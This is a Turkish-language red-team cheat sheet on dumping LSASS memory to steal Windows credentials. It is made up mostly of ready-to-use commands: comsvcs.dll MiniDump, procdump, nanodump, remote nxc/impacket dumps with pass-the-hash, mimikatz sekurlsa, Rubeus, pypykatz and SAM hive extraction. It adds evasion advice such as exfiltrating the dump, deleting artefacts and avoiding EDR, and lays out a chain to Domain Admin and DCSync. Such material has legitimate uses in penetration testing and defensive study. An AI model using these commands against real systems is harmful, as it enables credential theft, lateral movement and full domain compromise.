LSASS Credential Dumping
ATT&CK T1003.001 difficulty: orta
LSASS (lsass.exe) süreci; oturum açmış kullanıcıların parolalarını (WDigest / SSP’ye bağlı), NT hash’lerini, Kerberos biletlerini ve DPAPI anahtarlarını bellekte tutar. Yerel yönetici / SYSTEM / SeDebugPrivilege ile bu belleği dökmek, yanal harekette anahtar adımdır. Özellikle HasSession → AdminTo BloodHound yollarında “oturumu olan DA’yı yakala” senaryosudur.
Ön koşullar
Section titled “Ön koşullar”- Hedefte yüksek yetki: local admin + SeDebug, veya SYSTEM.
- Mümkünse PPL (RunAsPPL) kapalı / bypass edilebilir.
- Credential Guard açıksa bellekten klasik secret çıkarma kısıtlanır — alternatif: ticket, SAM, DCSync, DPAPI.
BloodHound: HasSession, AdminTo, CanRDP, CanPSRemote.
Bellek dökümü alma
Section titled “Bellek dökümü alma”tasklist /fi "imagename eq lsass.exe"Get-Process lsassrundll32 C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Windows\Temp\l.dmp fullprocdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\l.dmpnanodump.x64.exe --write C:\Windows\Temp\l.dmpnanodump.x64.exe --fork --write l.dmpcreatedump.exe -u -f l.dmp <PID>powershell -c "rundll32 ... MiniDump ..."Uzaktan tetikleme
Section titled “Uzaktan tetikleme”nxc smb 10.10.10.20 -u admin -H :NTHASH -M lsassynxc smb 10.10.10.20 -u admin -H :NTHASH -M nanodumpnxc smb 10.10.10.20 -u admin -H :NTHASH -M procdumpnxc smb 10.10.10.20 -u admin -H :NTHASH -M mimikatzimpacket-wmiexec -hashes :NTHASH domain.local/admin@10.10.10.20 \ 'rundll32 C:\Windows\System32\comsvcs.dll, MiniDump PID C:\Windows\Temp\l.dmp full'Hash / bilet çıkarma
Section titled “Hash / bilet çıkarma”-
Offline analiz (tercih — EDR’den uzak) :
Terminal window pypykatz lsa minidump l.dmpTerminal window pypykatz lsa minidump l.dmp -o json -
Canlı mimikatz / benzeri (host üzerinde SYSTEM):
privilege::debugtoken::elevatesekurlsa::logonpasswordssekurlsa::ekeyssekurlsa::tickets /exportsekurlsa::dpapiTerminal window Rubeus.exe dump /nowrapTerminal window Rubeus.exe triage -
Malzemeyi kullan : NT hash → Pass-the-Hash
-
.kirbi → Pass-the-Ticket
-
cleartext → spray / RDP / yeniden kullanım
-
DPAPI masterkey → DPAPI
PPL / Credential Guard notları (saldırgan bakışı)
Section titled “PPL / Credential Guard notları (saldırgan bakışı)”RunAsPPL açık → klasik MiniDump ACCESS DENIED → PPL bypass (mimikatz ! process / özel sürücü — yüksek risk, lab) → Handle duplication / SSP injection teknikleri (araç bağımlı) → LSASS'a dokunmadan: SAM (reg save), LSA secrets, DCSync, tickets from RubeusCredential Guard → NTLM/cred izolasyonu; Kerberos ticket çalma hâlâ mümkün olabilir# SAM + SYSTEM (local admin, LSASS'siz)reg save HKLM\SAM sam.savereg save HKLM\SYSTEM system.save# offline:impacket-secretsdump -sam sam.save -system system.save LOCALKomut üreteci
Section titled “Komut üreteci”LSASS · pypykatz
embedded toolGenerated command
pypykatz lsa minidump lsass.dmpLSASS · pypykatz
Section titled “LSASS · pypykatz”Saldırı zinciri
Section titled “Saldırı zinciri”BloodHound: HasSession(DA) on WS01 + AdminTo(you→WS01) → dump LSASS on WS01 → DA NTLM / TGT → DCSync / GoldenOpsec (ofansif)
Section titled “Opsec (ofansif)”- Dump’u hemen exfil et ve host’tan sil ; disk artefaktı ( .dmp ) ağır IOC.
- lsassy / nanodump gibi ağ araçları tercih; mimikatz binary drop etme.
- comsvcs MiniDump Event / Sysmon Process Access (10) üretir — beklenen gürültü.
- Aynı host’ta tekrar tekrar dump = gereksiz; bir kez al, offline parse et.
- WDigest açık değilse cleartext gelmeyebilir; NT + tickets yeter.
Yaygın tuzaklar
Section titled “Yaygın tuzaklar”- Admin ama SeDebug yok (Restricted Admin / bazı AV) → elevate SYSTEM ( psexec -s , impersonate ).
- 32-bit araçla 64-bit LSASS.
- Dump path yazılamıyor (permission); C:\Windows\Temp dene.
- Sadece machine account hash çıkması — interaktif oturum yok; DA’nın oturum açmasını bekle veya coerce et.
- Parse’i Windows’ta yapmak yerine pypykatz ile Linux’ta yap.
Sonraki adımlar
Section titled “Sonraki adımlar”Pass-the-Hash · Pass-the-Ticket · DPAPI · DCSync